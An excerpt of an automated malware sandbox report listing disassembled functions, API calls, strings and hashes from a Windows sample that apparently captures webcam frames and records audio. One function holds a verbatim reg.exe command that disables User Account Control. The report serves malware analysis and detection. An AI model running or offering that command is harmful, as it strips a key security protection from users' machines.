                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClassCreateErrorLastRegisterWindow
                        • String ID: 0$MsgWindowClass
                        • API String ID: 2877667751-2410386613
                        • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                        • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                        • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                        • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                        Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                          • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                        • _UnwindNestedFrames.LIBCMT ref: 00437631
                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                        • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                        • String ID: /zC
                        • API String ID: 2633735394-4132788633
                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                        Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                        • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                        • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                        • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: MetricsSystem
                        • String ID: ]tA
                        • API String ID: 4116985748-3517819141
                        • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                        • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                        • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                        • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                        Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                        Strings
                        • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreateProcess
                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                        • API String ID: 2922976086-4183131282
                        • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                        • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                        • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                        • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                        Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                        • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                        • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                        • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                        • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                        Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        Strings
                        • Connection KeepAlive | Disabled, xrefs: 004050D9
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                        • String ID: Connection KeepAlive | Disabled
                        • API String ID: 2993684571-3818284553
                        • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                        • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                        • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                        • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                        Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                        • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                        • Sleep.KERNEL32(00002710), ref: 00418DBD
                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: PlaySound$HandleLocalModuleSleepTime
                        • String ID: Alarm triggered
                        • API String ID: 614609389-2816303416
                        • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                        • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                        • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                        • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                        Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                        • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                        • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                        • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                        Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000,?), ref: 004044A4
                          • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: H_prologSleep
                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                        • API String ID: 3469354165-3547787478
                        • Opcode ID: 2596316b9bbcd228594034146af270f3e01bd3c3610974548e797489da08f636
                        • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                        • Opcode Fuzzy Hash: 2596316b9bbcd228594034146af270f3e01bd3c3610974548e797489da08f636
                        • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                        Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • _free.LIBCMT ref: 00442318
                        • _free.LIBCMT ref: 0044232F
                        • _free.LIBCMT ref: 0044234E
                        • _free.LIBCMT ref: 00442369
                        • _free.LIBCMT ref: 00442380
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$AllocateHeap
                        • String ID:
                        • API String ID: 3033488037-0
                        • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                        • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                        • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                        • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                        Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                        • _free.LIBCMT ref: 004468EC
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 00446AB8
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                        • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                        • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                        • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                        Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                        • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                        • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                        • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                        Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                        • __alloca_probe_16.LIBCMT ref: 0044E391
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                        • __freea.LIBCMT ref: 0044E3FD
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                        • String ID:
                        • API String ID: 313313983-0
                        • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                        • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                        • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                        • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                        Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                        • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                        • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                        • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                        • waveInStart.WINMM ref: 00401CDE
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                        • String ID:
                        • API String ID: 1356121797-0
                        • Opcode ID: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                        • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                        • Opcode Fuzzy Hash: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                        • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                        Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                        • _free.LIBCMT ref: 0044C59F
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                        • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                        • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                        • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                        Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                        • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreatePointerWrite
                        • String ID:
                        • API String ID: 1852769593-0
                        • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                        • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                        • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                        • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                        Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                        • int.LIBCPMT ref: 0040FBE8
                          • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                          • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                        • std::_Facet_Register.LIBCPMT ref: 0040FC28
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID:
                        • API String ID: 2536120697-0
                        • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                        • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                        • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                        • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                        Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 0044DBB4
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 0044DBC6
                        • _free.LIBCMT ref: 0044DBD8
                        • _free.LIBCMT ref: 0044DBEA
                        • _free.LIBCMT ref: 0044DBFC
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                        • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                        • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                        • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                        Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00441566
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 00441578
                        • _free.LIBCMT ref: 0044158B
                        • _free.LIBCMT ref: 0044159C
                        • _free.LIBCMT ref: 004415AD
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                        • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                        • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                        • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                        Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Enum$InfoQueryValue
                        • String ID: [regsplt]
                        • API String ID: 3554306468-4262303796
                        • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                        • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                        • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                        • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                        Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                        Download Yara Rule
                        APIs
                        • _strpbrk.LIBCMT ref: 0044B918
                        • _free.LIBCMT ref: 0044BA35
                          • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                          • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                          • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                        • String ID: *?$.
                        • API String ID: 2812119850-3972193922
